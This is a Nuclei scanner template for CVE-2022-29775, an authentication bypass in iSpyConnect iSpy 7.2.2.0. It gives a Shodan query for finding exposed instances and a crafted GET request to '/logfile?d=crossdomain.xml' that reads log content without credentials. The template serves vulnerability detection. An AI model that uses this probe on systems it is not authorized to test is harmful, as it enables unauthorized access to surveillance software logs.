nuclei-templates/cves/2022/CVE-2022-29775.yaml

47 lines
1.2 KiB
YAML

id: CVE-2022-29775
info:
name: iSpyConnect iSpy v7.2.2.0 - Improper Authentication
author: arafatansari
severity: critical
description: |
iSpyConnect iSpy v7.2.2.0 allows attackers to bypass authentication via a crafted URL.
reference:
- https://gist.github.com/securylight/79f673aa3a453c80c0e78f356a8f650b
- https://github.com/securylight/CVES_write_ups/blob/main/iSpy_connect.pdf
- https://nvd.nist.gov/vuln/detail/CVE-2022-29775
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=2022-29775
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-29775
cwe-id: CWE-287
metadata:
shodan-query: http.html:"iSpy is running"
verified: "true"
tags: cve,cve2022,ispy,auth-bypass
requests:
- method: GET
path:
- '{{BaseURL}}/logfile?d=crossdomain.xml'
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'Log Start'
- 'Log File'
- 'iSpy'
condition: and
- type: word
part: header
words:
- text/html
- type: status
status:
- 200